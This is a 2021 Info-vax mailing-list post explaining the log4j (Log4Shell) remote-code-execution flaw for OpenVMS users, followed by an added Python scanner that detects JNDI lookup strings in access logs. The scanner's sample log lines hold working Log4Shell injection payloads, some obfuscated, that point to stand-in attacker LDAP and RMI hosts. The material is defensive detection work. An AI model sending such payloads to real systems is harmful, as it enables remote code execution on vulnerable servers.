[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228, CVE-2021-45046

Stephen Hoffman seaohveh at hoffmanlabs.invalid
Tue Dec 14 23:09:56 EST 2021


On 2021-12-15 03:06:43 +0000, David Turner said:

> So the vulnerability is there. How would one take advantage of it anyway?
> Wouldn't you need a privileged account to even get into the server to 
> start taking advantage of the flaws?
> Assuming one is pretty careful about access to the network, and the 
> directory permissions are controlled, wouldn't it be hard to get to do 
> any damage?
> 
> Curious as I cannot find much information outside of the warning. I 
> guess no one wants to give hackers the keys to the rolls....

It's a full remote command execution flaw (RCE), meaning that pretty 
much anything that the Java app has access to is also exposed to the 
attacker, if the attacker can get the exploit text string to the 
logging software.

Access to the vulnerable logger can be via host name string, by HTTP 
headers, or by embedding the text into other data streams, depending on 
the app involved. It varies. Widely.

What can you do with the vulnerability?  There are reportedly already 
cryptocurrency miners and ransomware efforts underway using the 
vulnerability, and I expect we'll see a long tail of more...

An intro to the log4j vulnerability from the Swiss government: 
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/ 


List of affected products (re-post) : 
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

One of the security vendors with some info: 
https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/

There's a Python detection tool at that last URL, though I've not 
checked to see if that might be reasonably portable to OpenVMS.

Been working with some OpenVMS folks on this, and y'all with Java 
installed and Java apps in use will want to take a look at what's in 
those jars. Or if you have Java installed and don't need it, best 
remove it.


-- 
Pure Personal Opinion | HoffmanLabs LLC 
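Added example, not part of the post above and not the Python tool Hoff points to at the lunasec URL: a small scanner that looks for the Log4j lookup string in logged request data (here, web-server access-log lines), since that string is the thing the attacker has to get into the logger. The sample lines are constructed for this example (documentation-range addresses, made-up paths). Log4j 2 resolves nested lookups innermost-first, so the scanner first folds the common obfuscation wrappers (`${lower:...}`, `${upper:...}`, and any `${...:-default}` form such as `${::-j}` or `${env:NOPE:-j}`) the same way, then matches on the resulting `${jndi:scheme:...}`. It assumes every `:-` form takes its default (what an attacker relying on an unset variable gets), and it leaves any other lookup alone; anything it cannot fold is left in the line as-is.

```python
import re

# Constructed sample access-log lines (not real traffic). Line 1 is benign;
# lines 2-4 carry a JNDI lookup string in the User-Agent, the path, and a
# query parameter respectively, two of them obfuscated with nested lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [14/Dec/2021:22:01:07 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:22:01:09 -0500] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:22:01:11 -0500] "GET /${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [14/Dec/2021:22:01:13 -0500] "GET /?q=${${env:BARBAZ:-j}ndi:rmi://203.0.113.8:1099/c} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# An innermost lookup: ${...} whose body contains no further '${', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# The thing we are hunting for, after obfuscation has been folded away:
# ${jndi:<scheme>:...}. Case-insensitive because ${upper:...} can change case.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:[^}]*\}", re.IGNORECASE)


def _resolve_one(body: str):
    """Resolve one innermost lookup body the way Log4j 2 would for the
    wrappers attackers use to hide 'jndi'. Returns None when the lookup is
    not such a wrapper (including the jndi lookup itself), so it is kept."""
    if body.lstrip().lower().startswith("jndi:"):
        return None                      # this is the payload: keep it for matching
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:
        value = m.group(2)
        return value.lower() if m.group(1).lower() == "lower" else value.upper()
    if ":-" in body:
        # ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}, ${date:x:-j} ...
        # Assumption: the looked-up key is unset, so the default value wins.
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_passes: int = 50) -> str:
    """Fold nested obfuscation lookups innermost-first until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi_lookups(line: str):
    """Return [(scheme, lookup_text)] for every JNDI lookup in one log line."""
    normalized = normalize_lookups(line)
    return [(m.group(1).lower(), m.group(0)) for m in JNDI.finditer(normalized)]


def scan_log(lines):
    """Scan an iterable of log lines; return one finding dict per lookup hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for scheme, lookup in find_jndi_lookups(line):
            findings.append({"line": number, "scheme": scheme, "lookup": lookup})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['lookup']}")
```

A hit only proves that someone sent the string, not that anything resolved it; whether the app was exposed depends on which log4j jars are on the system, which is the "look at what's in those jars" step above. The folding here covers the wrappers seen in the wild in December 2021; a scanner that only greps for the literal `${jndi:` misses lines 3 and 4 of the sample entirely.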